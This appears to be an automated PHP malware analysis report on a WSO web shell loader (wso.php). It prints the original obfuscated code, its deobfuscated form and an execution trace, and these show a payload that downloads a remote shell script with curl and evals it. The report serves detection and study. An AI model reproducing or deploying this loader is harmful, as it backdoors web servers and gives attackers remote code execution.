wso.php

md5: 3bd87b813d8a651274ecb5632a811084

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Original, Traces)

Execution
eval (Original, Traces)

Title
301 Moved Permanently (HTML)

URLs
https://secghost.github.io/shell.txt (Traces)

Deobfuscated PHP code
<?php

$auth_pass = '1ce078f22a61442f2477cf8a3270abb1';
// MD5 : Evil_Twin
$etw = 'jVXbcqJAFPwVy7LKsEtwLlzLysPGxGtijIlE87IVQBBFICAqpvz3BTLosEsq+zbUnO7p032O1ra6Zso8uKpU5y1u+wolMbrw3F8D0Oa7lZvf4+GuE1vBXpkJzIvfc+435uIRjS6fmutb7V1+mC77z6H+Y2Wr1+wdPvx8MxqTatOMXH1je24l9oNAAPiipuuRixBka7YfzRHPs7WNtYx4WWY+gvkmCtxKvc7lVVx6JoXZmdQm5+axtl96OwXgytWZnTTxIchH9vQhKkfu9IFF6ib5YJq1w1J3AZbLeBCgoDSnIFEX4MjW6wmR43gmgqWCkESBE1ZKg5JqcD3LAKJUBpVT9nM9hGm9GfohFvlvey88VTAiUZTwrJaLOcDit5ITKEUqpNBwHXsQospVjjwxkGAy2cRchj3dEpfYvOfUu/MtaSzDEnFM8pjl+T6WSjMq9kuLBqlMz3M3vALKkIWmsHxK0XmHcikAFKNA2QNz3Q2U8vHB9AO0TBKiadh8+UuFpk7SjP1qg0Bp6iKk6fOJtHXtIPA04K9R+iyLvIWlYIUqOz9AnGdzI9ncIIY9FxEPMndIV/Q10Z1dE0lpqLZhrSD8H6dxlqS/jSQEvw2S3vBsudYbzRLQVy7wSnHOE0C8N0OUjnZJMMUBO5+zddrOQ0tWlDIgFL9aS+lzjBZLRyzPli4uDAbMkNreCXix1EYJfKE2a3MZL3xZpNWeCEg0bG56YUkT91IDia3U8hLf2NwHLu+KzUUyDFet9ztDr3cDrBlWY62t+NraAYOW4Rnd8U4/eNs7PHRmyPA0PAR3a8M3Ogs4swVfi5XDW0cNtZYA5t1Hd/C8WRrTfjhN6o2OsjNa1mqGrLB3O1Qnq/1o0h6bk5U6UdX+g9ruXz87w85Y7YW9m1v/IR7Hr9Mh1LqP1ujp+pMHqfzry72X6ku4HWPdDgctvTGy9ajf7Ts6VkOjtZLqVe7fVUf0nwwqji8vUj+YF/m6sW9B8BZnbh6T/zaSBldvNOrJdjQaoe5fQgn/AQ==';
eval /* PHPDeobfuscator eval output */ {
    $vcbf840 = "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";
    function yprr503($ccun221, $ipue244, $tgju488)
    {
        return '' . $ccun221 . '' . $ipue244 . '' . $tgju488 . '';
    }
    $xjow903 = yprr503($vcbf840[58], "al", $vcbf840[36]);
    $zjcn038 = yprr503("_u", "se", '');
    $llof213 = yprr503($vcbf840[27], $vcbf840[20], $vcbf840[39]);
    $nogd067 = yprr503($vcbf840[8], '', $vcbf840[11]);
    $fsps364 = yprr503($vcbf840[58], $vcbf840[20], "ar");
    $kjhe036 = yprr503($vcbf840[27], $vcbf840[69], $vcbf840[25]);
    $smyo112 = yprr503(yprr503($xjow903, '', $zjcn038), yprr503($llof213, $nogd067, ''), yprr503($fsps364, '', $kjhe036));
    $gopp378 = yprr503($vcbf840[58], $vcbf840[27], $vcbf840[0]);
    $oont490 = yprr503($vcbf840[69], $vcbf840[38], '');
    $lllq180 = yprr503($vcbf840[0], '', $vcbf840[20]);
    $ecnr938 = yprr503($vcbf840[39], $vcbf840[8], $vcbf840[11]);
    $ffdi480 = yprr503($vcbf840[58], $vcbf840[38], '');
    $dxkt204 = yprr503($vcbf840[61], $vcbf840[10], '');
    $icbz544 = yprr503('', $vcbf840[11], '');
    $uohg939 = yprr503(yprr503($gopp378, $oont490, $lllq180), yprr503($ecnr938, '', $ffdi480), yprr503($dxkt204, '', $icbz544));
    $idgk110 = yprr503($vcbf840[0], '', $vcbf840[3]);
    $opvu721 = yprr503($vcbf840[69], $vcbf840[36], $vcbf840[9]);
    $mtbg524 = yprr503('', $vcbf840[49], $vcbf840[69]);
    $yxfs212 = yprr503($vcbf840[57], $vcbf840[0], $vcbf840[7]);
    $vesg899 = yprr503($vcbf840[16], $vcbf840[20], $vcbf840[70]);
    $ehjl604 = yprr503($vcbf840[0], $vcbf840[58], $vcbf840[10]);
    $bxlr460 = yprr503($vcbf840[70], $vcbf840[0], $vcbf840[9]);
    $jyhp869 = yprr503(yprr503($idgk110, $opvu721, ''), yprr503('', '', $mtbg524), yprr503($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwczovL3NlY2dob3N0LmdpdGh1Yi5pby9zaGVsbC50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'" . yprr503("))", '', $vcbf840[46]);
    $smyo112($uohg939, array('', '}' . $jyhp869 . '//'));
    //scp-173
};
Execution traces
data/traces/3bd87b813d8a651274ecb5632a811084_trace-1676238716.2167.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:52:22.114562]
1	0	1	0.000188	393512
1	3	0	0.000248	395144	{main}	1		/var/www/html/uploads/wso.php	0	0
1		A						/var/www/html/uploads/wso.php	2	$auth_pass = '1ce078f22a61442f2477cf8a3270abb1'
1		A						/var/www/html/uploads/wso.php	3	$etw = 'jVXbcqJAFPwVy7LKsEtwLlzLysPGxGtijIlE87IVQBBFICAqpvz3BTLosEsq+zbUnO7p032O1ra6Zso8uKpU5y1u+wolMbrw3F8D0Oa7lZvf4+GuE1vBXpkJzIvfc+435uIRjS6fmutb7V1+mC77z6H+Y2Wr1+wdPvx8MxqTatOMXH1je24l9oNAAPiipuuRixBka7YfzRHPs7WNtYx4WWY+gvkmCtxKvc7lVVx6JoXZmdQm5+axtl96OwXgytWZnTTxIchH9vQhKkfu9IFF6ib5YJq1w1J3AZbLeBCgoDSnIFEX4MjW6wmR43gmgqWCkESBE1ZKg5JqcD3LAKJUBpVT9nM9hGm9GfohFvlvey88VTAiUZTwrJaLOcDit5ITKEUqpNBwHXsQospVjjwxkGAy2cRchj3dEpfYvOfUu/MtaSzDEnFM8pjl+T6WSjMq9kuLBqlMz3M3vALKkIWmsHxK0XmHcikAFKNA2QNz3Q2U8vHB9AO0TBKiadh8+UuF'
2	4	0	0.000304	395144	base64_decode	0		/var/www/html/uploads/wso.php	3	1	'jVXbcqJAFPwVy7LKsEtwLlzLysPGxGtijIlE87IVQBBFICAqpvz3BTLosEsq+zbUnO7p032O1ra6Zso8uKpU5y1u+wolMbrw3F8D0Oa7lZvf4+GuE1vBXpkJzIvfc+435uIRjS6fmutb7V1+mC77z6H+Y2Wr1+wdPvx8MxqTatOMXH1je24l9oNAAPiipuuRixBka7YfzRHPs7WNtYx4WWY+gvkmCtxKvc7lVVx6JoXZmdQm5+axtl96OwXgytWZnTTxIchH9vQhKkfu9IFF6ib5YJq1w1J3AZbLeBCgoDSnIFEX4MjW6wmR43gmgqWCkESBE1ZKg5JqcD3LAKJUBpVT9nM9hGm9GfohFvlvey88VTAiUZTwrJaLOcDit5ITKEUqpNBwHXsQospVjjwxkGAy2cRchj3dEpfYvOfUu/MtaSzDEnFM8pjl+T6WSjMq9kuLBqlMz3M3vALKkIWmsHxK0XmHcikAFKNA2QNz3Q2U8vHB9AO0TBKiadh8+UuF'
2	4	1	0.000331	396456
2	4	R			'�U�r�@\024�\025˲ʰKp.\\�����kb��D�\025@\020E  *���\0052�K*�6Ԝ���}�ֶ�f�<��T�-n�\n%1���_\003�滕����\023[�^�\t̋�s�7��\021�.���[�]~�.�ϡ�ce���\035>�|3\032�jӌ\\}c{n%��@\000���둋\020dk�\037�\021ϳ����xYf>��&\n�J���U\\z&�ٙ�&�汶_z;\005��ՙ�4�!�G��!*G��E�&�`���Rw\001��x\020��4� Q\027����\t��x&����D�\023VJ��jp=�\000�T\006�S�s=�i�\031�!\026�o{/<U0"Q�𬖋9�ⷒ\023(E*��p\035{\020��U�<1�`2��\\�=�\022�ؼ�Ի�-i,�\022qL��>�J3*�K�\006�L�s7�\002ʐ���|J�y�r)\000\024�@�\003s�\r����\003�L\022�i�|�K��NҌ�j�@i�"���'
2	5	0	0.000394	396424	gzinflate	0		/var/www/html/uploads/wso.php	3	1	'�U�r�@\024�\025˲ʰKp.\\�����kb��D�\025@\020E  *���\0052�K*�6Ԝ���}�ֶ�f�<��T�-n�\n%1���_\003�滕����\023[�^�\t̋�s�7��\021�.���[�]~�.�ϡ�ce���\035>�|3\032�jӌ\\}c{n%��@\000���둋\020dk�\037�\021ϳ����xYf>��&\n�J���U\\z&�ٙ�&�汶_z;\005��ՙ�4�!�G��!*G��E�&�`���Rw\001��x\020��4� Q\027����\t��x&����D�\023VJ��jp=�\000�T\006�S�s=�i�\031�!\026�o{/<U0"Q�𬖋9�ⷒ\023(E*��p\035{\020��U�<1�`2��\\�=�\022�ؼ�Ի�-i,�\022qL��>�J3*�K�\006�L�s7�\002ʐ���|J�y�r)\000\024�@�\003s�\r����\003�L\022�i�|�K��NҌ�j�@i�"���'
2	5	1	0.000466	398504
2	5	R			'$vcbf840= "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";function yprr503($ccun221,$ipue244,$tgju488){return \'\'.$ccun221.\'\'.$ipue244.\'\'.$tgju488.\'\';}$xjow903 = yprr503($vcbf840{58},$vcbf840{69}.$vcbf840{36},$vcbf840{36});$zjcn038 = yprr503($vcbf840{20}.$vcbf840{8},$vcbf840{57}.$vcbf840{0},\'\');$llof213 = yprr503($vcbf840{27},$vcbf840{20},$vcbf840{39});$nogd067 = yprr503($vcbf840{8},\'\',$vcbf840{11});$fsps364 = yprr503($vcbf840{58},$vcbf840{20},$vcbf840{69}.$vcbf840{27}'
2	6	0	0.000643	416912	eval	1	'$vcbf840= "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";function yprr503($ccun221,$ipue244,$tgju488){return \'\'.$ccun221.\'\'.$ipue244.\'\'.$tgju488.\'\';}$xjow903 = yprr503($vcbf840{58},$vcbf840{69}.$vcbf840{36},$vcbf840{36});$zjcn038 = yprr503($vcbf840{20}.$vcbf840{8},$vcbf840{57}.$vcbf840{0},\'\');$llof213 = yprr503($vcbf840{27},$vcbf840{20},$vcbf840{39});$nogd067 = yprr503($vcbf840{8},\'\',$vcbf840{11});$fsps364 = yprr503($vcbf840{58},$vcbf840{20},$vcbf840{69}.$vcbf840{27});$kjhe036 = yprr503($vcbf840{27},$vcbf840{69},$vcbf840{25});$smyo112 =yprr503(yprr503($xjow903,\'\',$zjcn038),yprr503($llof213,$nogd067,\'\'),yprr503($fsps364,\'\',$kjhe036));$gopp378 = yprr503($vcbf840{58},$vcbf840{27},$vcbf840{0});$oont490 = yprr503($vcbf840{69},$vcbf840{38},\'\');$lllq180 = yprr503($vcbf840{0},\'\',$vcbf840{20});$ecnr938 = yprr503($vcbf840{39},$vcbf840{8},$vcbf840{11});$ffdi480 = yprr503($vcbf840{58},$vcbf840{38},\'\');$dxkt204 = yprr503($vcbf840{61},$vcbf840{10},\'\');$icbz544 = yprr503(\'\',$vcbf840{11},\'\');$uohg939 = yprr503( yprr503($gopp378,$oont490,$lllq180), yprr503($ecnr938,\'\',$ffdi480), yprr503($dxkt204,\'\',$icbz544));$idgk110 = yprr503($vcbf840{0},\'\',$vcbf840{3});$opvu721= yprr503($vcbf840{69},$vcbf840{36},$vcbf840{9});$mtbg524 = yprr503(\'\',$vcbf840{49},$vcbf840{69});$yxfs212 = yprr503($vcbf840{57},$vcbf840{0},$vcbf840{7});$vesg899 = yprr503($vcbf840{16},$vcbf840{20},$vcbf840{70});$ehjl604 = yprr503($vcbf840{0},$vcbf840{58},$vcbf840{10});$bxlr460 = yprr503($vcbf840{70},$vcbf840{0},$vcbf840{9});$jyhp869 = yprr503(yprr503($idgk110,$opvu721,\'\'),yprr503(\'\',\'\',$mtbg524),yprr503($yxfs212,$vesg899.$ehjl604,$bxlr460))."\'JGNoID0gY3VybF9pbml0KCdodHRwczovL3NlY2dob3N0LmdpdGh1Yi5pby9zaGVsbC50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7\'".yprr503($vcbf840{32}.$vcbf840{32},\'\',$vcbf840{46});$smyo112($uohg939,array(\'\',\'}\'.$jyhp869.\'//\'));//scp-173'	/var/www/html/uploads/wso.php	3	0
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$vcbf840 = 'eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U'
3	7	0	0.000730	416944	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'c'	'al'	'l'
3	7	1	0.000747	416976
3	7	R			'call'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$xjow903 = 'call'
3	8	0	0.000773	417008	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'_u'	'se'	''
3	8	1	0.000788	417040
3	8	R			'_use'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$zjcn038 = '_use'
3	9	0	0.000813	416976	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'r'	'_'	'f'
3	9	1	0.000834	417008
3	9	R			'r_f'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$llof213 = 'r_f'
3	10	0	0.000859	417008	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'u'	''	'n'
3	10	1	0.000874	417040
3	10	R			'un'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$nogd067 = 'un'
3	11	0	0.000899	417072	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'c'	'_'	'ar'
3	11	1	0.000913	417104
3	11	R			'c_ar'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$fsps364 = 'c_ar'
3	12	0	0.000937	417072	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'r'	'a'	'y'
3	12	1	0.000951	417104
3	12	R			'ray'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$kjhe036 = 'ray'
3	13	0	0.000976	417104	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'call'	''	'_use'
3	13	1	0.000990	417144
3	13	R			'call_use'
3	14	0	0.001004	417144	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'r_f'	'un'	''
3	14	1	0.001018	417176
3	14	R			'r_fun'
3	15	0	0.001032	417176	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'c_ar'	''	'ray'
3	15	1	0.001046	417208
3	15	R			'c_array'
3	16	0	0.001059	417208	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'call_use'	'r_fun'	'c_array'
3	16	1	0.001074	417256
3	16	R			'call_user_func_array'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$smyo112 = 'call_user_func_array'
3	17	0	0.001100	417152	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'c'	'r'	'e'
3	17	1	0.001114	417184
3	17	R			'cre'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$gopp378 = 'cre'
3	18	0	0.001138	417184	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'a'	't'	''
3	18	1	0.001152	417216
3	18	R			'at'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$oont490 = 'at'
3	19	0	0.001176	417216	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'e'	''	'_'
3	19	1	0.001194	417248
3	19	R			'e_'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$lllq180 = 'e_'
3	20	0	0.001218	417248	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'f'	'u'	'n'
3	20	1	0.001253	417280
3	20	R			'fun'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$ecnr938 = 'fun'
3	21	0	0.001285	417280	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'c'	't'	''
3	21	1	0.001301	417312
3	21	R			'ct'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$ffdi480 = 'ct'
3	22	0	0.001325	417312	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'i'	'o'	''
3	22	1	0.001416	417344
3	22	R			'io'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$dxkt204 = 'io'
3	23	0	0.001447	417344	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	''	'n'	''
3	23	1	0.001462	417376
3	23	R			'n'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$icbz544 = 'n'
3	24	0	0.001486	417376	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'cre'	'at'	'e_'
3	24	1	0.001500	417408
3	24	R			'create_'
3	25	0	0.001514	417408	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'fun'	''	'ct'
3	25	1	0.001528	417440
3	25	R			'funct'
3	26	0	0.001542	417440	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'io'	''	'n'
3	26	1	0.001556	417472
3	26	R			'ion'
3	27	0	0.001568	417472	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'create_'	'funct'	'ion'
3	27	1	0.001583	417512
3	27	R			'create_function'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$uohg939 = 'create_function'
3	28	0	0.001609	417416	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'e'	''	'v'
3	28	1	0.001623	417448
3	28	R			'ev'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$idgk110 = 'ev'
3	29	0	0.001653	417448	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'a'	'l'	'('
3	29	1	0.001667	417480
3	29	R			'al('
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$opvu721 = 'al('
3	30	0	0.001691	417480	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	''	'b'	'a'
3	30	1	0.001705	417512
3	30	R			'ba'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$mtbg524 = 'ba'
3	31	0	0.001729	417512	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	's'	'e'	'6'
3	31	1	0.001743	417544
3	31	R			'se6'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$yxfs212 = 'se6'
3	32	0	0.001766	417544	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'4'	'_'	'd'
3	32	1	0.001780	417576
3	32	R			'4_d'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$vesg899 = '4_d'
3	33	0	0.001803	417576	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'e'	'c'	'o'
3	33	1	0.001817	417608
3	33	R			'eco'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$ehjl604 = 'eco'
3	34	0	0.001853	417608	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'd'	'e'	'('
3	34	1	0.001868	417640
3	34	R			'de('
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$bxlr460 = 'de('
3	35	0	0.001891	417640	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'ev'	'al('	''
3	35	1	0.001905	417672
3	35	R			'eval('
3	36	0	0.001919	417672	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	''	''	'ba'
3	36	1	0.001933	417704
3	36	R			'ba'
3	37	0	0.001946	417736	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'se6'	'4_deco'	'de('
3	37	1	0.001960	417776
3	37	R			'se64_decode('
3	38	0	0.001974	417744	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'eval('	'ba'	'se64_decode('
3	38	1	0.001989	417792
3	38	R			'eval(base64_decode('
3	39	0	0.002004	417928	yprr503	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	3	'))'	''	';'
3	39	1	0.002018	417960
3	39	R			'));'
2		A						/var/www/html/uploads/wso.php(3) : eval()'d code	1	$jyhp869 = 'eval(base64_decode(\'JGNoID0gY3VybF9pbml0KCdodHRwczovL3NlY2dob3N0LmdpdGh1Yi5pby9zaGVsbC50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7\'));'
3	40	0	0.002055	418528	call_user_func_array:{/var/www/html/uploads/wso.php(3) : eval()'d code:1}	0		/var/www/html/uploads/wso.php(3) : eval()'d code	1	2	'create_function'	[0 => '', 1 => '}eval(base64_decode(\'JGNoID0gY3VybF9pbml0KCdodHRwczovL3NlY2dob3N0LmdpdGh1Yi5pby9zaGVsbC50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7\'));//']
4	41	0	0.002097	419016	create_function	0		/var/www/html/uploads/wso.php(3) : eval()'d code	1	2	''	'}eval(base64_decode(\'JGNoID0gY3VybF9pbml0KCdodHRwczovL3NlY2dob3N0LmdpdGh1Yi5pby9zaGVsbC50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7\'));//'
5	42	0	0.002136	420832	{internal eval}	1		/var/www/html/uploads/wso.php(3) : eval()'d code	1	0
6	43	0	0.002150	420832	base64_decode	0		/var/www/html/uploads/wso.php(3) : eval()'d code(1) : runtime-created function	1	1	'JGNoID0gY3VybF9pbml0KCdodHRwczovL3NlY2dob3N0LmdpdGh1Yi5pby9zaGVsbC50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'
6	43	1	0.002173	421088
6	43	R			'$ch = curl_init(\'https://secghost.github.io/shell.txt\');curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($ch);eval(\'?>\'.$result);'
6	44	0	0.002210	422728	{internal eval}	1		/var/www/html/uploads/wso.php(3) : eval()'d code(1) : runtime-created function	1	0
7	45	0	0.002225	422728	curl_init	0		/var/www/html/uploads/wso.php(3) : eval()'d code(1) : runtime-created function(1) : eval()'d code	1	1	'https://secghost.github.io/shell.txt'
7	45	1	0.002252	423672
7	45	R			resource(3) of type (curl)
6		A						/var/www/html/uploads/wso.php(3) : eval()'d code(1) : runtime-created function(1) : eval()'d code	1	$ch = resource(3) of type (curl)
7	46	0	0.002294	423640	curl_setopt	0		/var/www/html/uploads/wso.php(3) : eval()'d code(1) : runtime-created function(1) : eval()'d code	1	3	resource(3) of type (curl)	19913	1
7	46	1	0.002318	423736
7	46	R			TRUE
7	47	0	0.002331	423640	curl_exec	0		/var/www/html/uploads/wso.php(3) : eval()'d code(1) : runtime-created function(1) : eval()'d code	1	1	resource(3) of type (curl)
7	47	1	0.111284	423928
7	47	R			'<html>\r\n<head><title>301 Moved Permanently</title></head>\r\n<body>\r\n<center><h1>301 Moved Permanently</h1></center>\r\n<hr><center>nginx</center>\r\n</body>\r\n</html>\r\n'
6		A						/var/www/html/uploads/wso.php(3) : eval()'d code(1) : runtime-created function(1) : eval()'d code	1	$result = '<html>\r\n<head><title>301 Moved Permanently</title></head>\r\n<body>\r\n<center><h1>301 Moved Permanently</h1></center>\r\n<hr><center>nginx</center>\r\n</body>\r\n</html>\r\n'
7	48	0	0.111369	424616	{internal eval}	1		/var/www/html/uploads/wso.php(3) : eval()'d code(1) : runtime-created function(1) : eval()'d code	1	0
7	48	1	0.111389	424616
6	44	1	0.111397	424056
5	42	1	0.111406	422544
5	42	R			NULL
4	41	1	0.111424	421056
4	41	R			'\000lambda_1'
3	40	1	0.111439	420960
3	40	R			'\000lambda_1'
2	6	1	0.111455	419872
1	3	1	0.111464	400664
			0.112120	319064
TRACE END   [2023-02-12 19:52:22.226531]

Generated HTML code
<html><head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>


</body></html>
Original PHP code
<?php 
$auth_pass = '1ce078f22a61442f2477cf8a3270abb1'; // MD5 : Evil_Twin
$etw = 'jVXbcqJAFPwVy7LKsEtwLlzLysPGxGtijIlE87IVQBBFICAqpvz3BTLosEsq+zbUnO7p032O1ra6Zso8uKpU5y1u+wolMbrw3F8D0Oa7lZvf4+GuE1vBXpkJzIvfc+435uIRjS6fmutb7V1+mC77z6H+Y2Wr1+wdPvx8MxqTatOMXH1je24l9oNAAPiipuuRixBka7YfzRHPs7WNtYx4WWY+gvkmCtxKvc7lVVx6JoXZmdQm5+axtl96OwXgytWZnTTxIchH9vQhKkfu9IFF6ib5YJq1w1J3AZbLeBCgoDSnIFEX4MjW6wmR43gmgqWCkESBE1ZKg5JqcD3LAKJUBpVT9nM9hGm9GfohFvlvey88VTAiUZTwrJaLOcDit5ITKEUqpNBwHXsQospVjjwxkGAy2cRchj3dEpfYvOfUu/MtaSzDEnFM8pjl+T6WSjMq9kuLBqlMz3M3vALKkIWmsHxK0XmHcikAFKNA2QNz3Q2U8vHB9AO0TBKiadh8+UuFpk7SjP1qg0Bp6iKk6fOJtHXtIPA04K9R+iyLvIWlYIUqOz9AnGdzI9ncIIY9FxEPMndIV/Q10Z1dE0lpqLZhrSD8H6dxlqS/jSQEvw2S3vBsudYbzRLQVy7wSnHOE0C8N0OUjnZJMMUBO5+zddrOQ0tWlDIgFL9aS+lzjBZLRyzPli4uDAbMkNreCXix1EYJfKE2a3MZL3xZpNWeCEg0bG56YUkT91IDia3U8hLf2NwHLu+KzUUyDFet9ztDr3cDrBlWY62t+NraAYOW4Rnd8U4/eNs7PHRmyPA0PAR3a8M3Ogs4swVfi5XDW0cNtZYA5t1Hd/C8WRrTfjhN6o2OsjNa1mqGrLB3O1Qnq/1o0h6bk5U6UdX+g9ruXz87w85Y7YW9m1v/IR7Hr9Mh1LqP1ujp+pMHqfzry72X6ku4HWPdDgctvTGy9ajf7Ts6VkOjtZLqVe7fVUf0nwwqji8vUj+YF/m6sW9B8BZnbh6T/zaSBldvNOrJdjQaoe5fQgn/AQ=='; eval(gzinflate(base64_decode("$etw"))); ?>
PHP Malware Analysis

wso.php

md5: 3bd87b813d8a651274ecb5632a811084

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
